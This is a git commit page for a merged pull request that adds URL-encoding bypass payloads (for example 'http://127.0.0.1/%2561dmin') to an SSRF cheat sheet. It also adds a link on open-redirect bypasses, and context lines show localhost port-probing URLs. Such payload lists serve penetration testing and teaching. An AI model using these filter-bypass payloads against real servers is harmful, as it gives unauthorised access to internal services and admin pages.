Merge pull request #206 from engn33r/master

Added SSRF bypass details
This commit is contained in:
Swissky 2020-05-13 22:47:57 +02:00 committed by GitHub
commit 1d8714615d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -15,6 +15,7 @@
* [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding) * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding)
* [Bypass using malformed urls](#bypass-using-malformed-urls) * [Bypass using malformed urls](#bypass-using-malformed-urls)
* [Bypass using rare address](#bypass-using-rare-address) * [Bypass using rare address](#bypass-using-rare-address)
* [Bypass using URL encoding](#bypass-using-url-encoding)
* [Bypass using bash variables](#bypass-using-bash-variables) * [Bypass using bash variables](#bypass-using-bash-variables)
* [Bypass using tricks combination](#bypass-using-tricks-combination) * [Bypass using tricks combination](#bypass-using-tricks-combination)
* [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics) * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)
@ -76,7 +77,7 @@ http://localhost:443
http://localhost:22 http://localhost:22
``` ```
Advanced exploit using a redirection Advanced exploit [using a redirection](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
```powershell ```powershell
1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com 1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com
@ -177,6 +178,15 @@ http://127.1
http://127.0.1 http://127.0.1
``` ```
### Bypass using URL encoding
[Single or double encode a specific URL to bypass blacklist](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter)
```powershell
http://127.0.0.1/%61dmin
http://127.0.0.1/%2561dmin
```
### Bypass using bash variables ### Bypass using bash variables
(curl only) (curl only)